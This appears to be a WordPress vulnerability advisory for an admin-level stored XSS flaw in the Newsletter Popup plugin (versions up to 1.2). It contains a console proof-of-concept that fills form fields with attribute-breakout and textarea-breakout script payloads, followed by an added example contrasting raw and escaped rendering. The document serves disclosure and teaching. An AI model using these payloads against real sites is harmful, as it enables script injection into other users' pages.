wpexploit | Bob Matyas | WPEX-ID:10EB712A-D9C3-46C9-BE6A-02811396FAE8
History: Apr 25, 2024 - 12:00 a.m.

Newsletter Popup <= 1.2 - Admin+ Stored XSS

Tags: stored xss, newsletter popup, admin, security update, exploit

AI Score: 5.7 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 8.7%)

Description

The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup).

1. Go to "Newsletter Popup > Add New"
2. In the browser console, enter:

```
// Fill every text input with an attribute-context test value
let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' );
inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );
// Fill every textarea with an element-body test value
let textareas = document.querySelectorAll( '#wpbody-content textarea' );
textareas.forEach( (element) => element.value=`</textarea><script>alert(/XSS: ${element.name}/)</script>` );
```

3. Click "Save Changes"
4. Go to "Manage Newsletters" and edit the newsletter that you added
5. See multiple XSS examples
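
Why the two values in step 2 execute, and what output escaping changes, as an added example that is not the plugin's code or part of the original advisory: a hypothetical settings form (`renderInput`, `renderTextarea` and the field name `title` are assumptions) renders a stored value raw and escaped, and two checks report whether the value left its attribute or textarea context. In WordPress the corresponding output helpers are `esc_attr()` and `esc_textarea()`.

```javascript
// Added example. renderInput/renderTextarea and the field name "title" are
// hypothetical stand-ins for a settings form, not the plugin's own code.

// Encode the characters that can terminate an attribute value or element body.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// escape = false: the stored setting is concatenated into the markup unchanged.
// escape = true: the setting is encoded for its output context.
function renderInput(name, value, escape) {
  const v = escape ? escapeHtml(value) : value;
  return `<input type="text" name="${name}" value="${v}">`;
}
function renderTextarea(name, value, escape) {
  const v = escape ? escapeHtml(value) : value;
  return `<textarea name="${name}">${v}</textarea>`;
}

// List the attribute names an HTML tokenizer would see on a single tag.
function attrNames(tag) {
  const inner = tag.replace(/^<\w+/, '').replace(/>$/, '');
  const re = /([^\s"'<>\/=]+)(?:=(?:"[^"]*"|'[^']*'|[^\s"'>]*))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inner)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// A stored value broke out if it added on* attributes or closed the textarea early.
function addedHandlers(inputHtml) {
  return attrNames(inputHtml).filter((n) => n.startsWith('on'));
}
function closesEarly(textareaHtml) {
  return textareaHtml.indexOf('</textarea') !== textareaHtml.lastIndexOf('</textarea');
}

// Constructed sample: the two values from step 2, as stored for a field "title".
const attrValue = '" style=animation-name:rotation onanimationstart=alert(/XSS: title/)//';
const bodyValue = '</textarea><script>alert(/XSS: title/)</script>';

console.log('raw input handlers:', addedHandlers(renderInput('title', attrValue, false)));
console.log('escaped input handlers:', addedHandlers(renderInput('title', attrValue, true)));
console.log('raw textarea closes early:', closesEarly(renderTextarea('title', bodyValue, false)));
console.log('escaped textarea closes early:', closesEarly(renderTextarea('title', bodyValue, true)));
```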
